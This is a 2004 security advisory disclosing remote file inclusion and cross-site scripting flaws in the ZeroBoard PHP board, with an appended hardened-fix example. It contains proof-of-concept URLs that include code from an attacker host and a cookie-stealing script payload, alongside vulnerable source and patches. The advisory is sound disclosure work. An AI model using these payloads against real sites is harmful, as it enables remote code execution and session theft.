
ZeroBoard PHP source injection and cross-site scripting vulns
STG Security Advisory: [SSA-20041220-16] PHP source injection and cross-site scripting vulnerabilities in ZeroBoard

Revision 1.2
Date Published: 2004-12-20 (KST)
Last Update: 2004-12-24
Disclosed by SSR Team (advisory@stgsecurity.com)

Summary
=======
ZeroBoard is one of the widely used web BBS applications in Korea. However, an input validation flaw allows malicious attackers to run arbitrary commands with the privileges of the HTTPD process, which typically runs as the nobody user.





Vulnerability Class
===================
Implementation Error: Input validation flaw

Impact
======
High: arbitrary command execution.

Affected Products
=================
ZeroBoard 4.1pl4 and prior

Vendor Status: NOT FIXED
========================
2004-11-20 Vulnerabilities found.
2004-11-20 1st vendor contact, but they did not reply.
2004-11-22 2nd vendor contact, but they did not reply.
2004-12-13 STG Security, Inc. customers notified.
2004-12-24 Official release.



Details
=======
Vulnerability 1 : PHP source injection vulnerability
----------------------------------------------------
- Proof of concept
http://[victim]/outlogin.php?_zb_path=ftp://[attacker]/pub/

- Environment
PHP 5.0.x
php.ini : register_globals = On

- Description
As of PHP 5.0.0, file_exists() can be used with URL wrappers, as explained at
http://www.php.net/manual/en/function.file-exists.php. With register_globals
enabled, the _zb_path parameter of outlogin.php comes straight from the
request, so a remote directory passes the file_exists() check and the same
prefix is then used in the include statement; the parameter can therefore be
easily exploited.

- Part of vulnerable source, outlogin.php
----
// check that this is a ZeroBoard directory
if(!file_exists($_zb_path."lib.php")) {
  echo "제로보드 디렉토리가 아닙니다";
  return;
}

// read _head.php
@include $_zb_path."_head.php";

}
----



Vulnerability 2 : PHP source injection vulnerability
----------------------------------------------------
- Proof of concept
http://[victim]/include/write.php?dir=http://[attacker]/

- Environment
php.ini: register_globals = On

- Reason
Uninitialized $dir variable in write.php

- Part of vulnerable source, include/write.php
----
include $dir."/write.php";
----



Vulnerability 3 : Cross-site scripting vulnerability
----------------------------------------------------
- Proof of concept
http://[victim]/check_user_id.php?user_id=<script>alert(document.cookie)

- Reason
check_user_id.php doesn't validate the input value of user_id.

- Part of vulnerable source, check_user_id.php
----
$user_id = trim($user_id);
... (omitted) ...
if($check[0]) echo "$user_id 는 이미 등록된 아이디입니다"; else echo "$user_id 는 사용하실수 있습니다";
... (omitted) ...
----

Workaround
==========
Without official patches for these vulnerabilities, modify the vulnerable sources as recommended below.

Vulnerability 1: As of zboard 4.1pl4
------------------------------------
Insert the following code at line 59 of outlogin.php:
if(eregi(":\/\/",$_zb_path)) $_zb_path="";

Vulnerability 2: As of zboard 4.1pl4
------------------------------------
Insert the following code at line 15 of include/write.php:
if(eregi(":\/\/",$dir)) $dir="";

Vulnerability 3: As of zboard 4.1pl4
------------------------------------
Insert the following code at line 3 of check_user_id.php:
$user_id = htmlspecialchars(trim($user_id));

Credits
=======
Jeremy Bae at STG Security
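As an added example that is not part of this advisory or of ZeroBoard's own code, the following PHP (7.1 or later) shows hardened forms of the Workaround checks: the path check rejects any URL scheme rather than only the "://" form and confines the resolved directory to the installation root, and the user_id output is escaped with htmlspecialchars(). The function names, the temporary install root, and treating the requested path as relative to that root are assumptions of this example; the caller's existing file_exists() check for lib.php is left in place.

```php
<?php
// Added example, not ZeroBoard's code: hardened replacements for the checks
// in the Workaround section. Function names and the temp install root are
// assumptions made for this demo.

// Reject anything that would reach a PHP stream wrapper (ftp://, http://, ...)
// and anything that resolves outside the installation root. $requested is
// taken relative to $install_root, unlike ZeroBoard's raw $_zb_path prefix.
function zb_safe_include_dir(string $requested, string $install_root): ?string
{
    // Any scheme prefix is rejected; this generalises the advisory's
    // eregi(":\/\/") workaround, which only catches the "://" form.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $requested)) {
        return null;
    }
    // A null byte could truncate the path in older PHP file functions.
    if (strpos($requested, "\0") !== false) {
        return null;
    }
    $root = realpath($install_root);
    $dir  = realpath($install_root . '/' . $requested); // false if missing
    if ($root === false || $dir === false) {
        return null;
    }
    // The canonical path must be the root itself or sit strictly below it,
    // which also blocks "../" escapes.
    if ($dir !== $root && strncmp($dir, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $dir . '/';
}

// XSS fix: escape user-controlled text before echoing it into HTML.
function zb_escape_html(string $value): string
{
    return htmlspecialchars(trim($value), ENT_QUOTES, 'UTF-8');
}

// Constructed demo: a temporary install root holding lib.php and a skin dir.
$root = sys_get_temp_dir() . '/zb_demo_' . getmypid();
mkdir($root . '/skin', 0700, true);
touch($root . '/lib.php');
foreach (['ftp://example.invalid/pub/', 'http://example.invalid/', '../outside/', 'skin', '.'] as $c) {
    $dir = zb_safe_include_dir($c, $root);
    printf("%-28s => %s\n", $c, $dir === null ? 'REJECTED' : 'ok: ' . $dir);
}
echo zb_escape_html('<script>alert(document.cookie)</script>'), "\n";
unlink($root . '/lib.php'); rmdir($root . '/skin'); rmdir($root);
```

eregi() was removed in PHP 7, so preg_match() is used here in its place.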
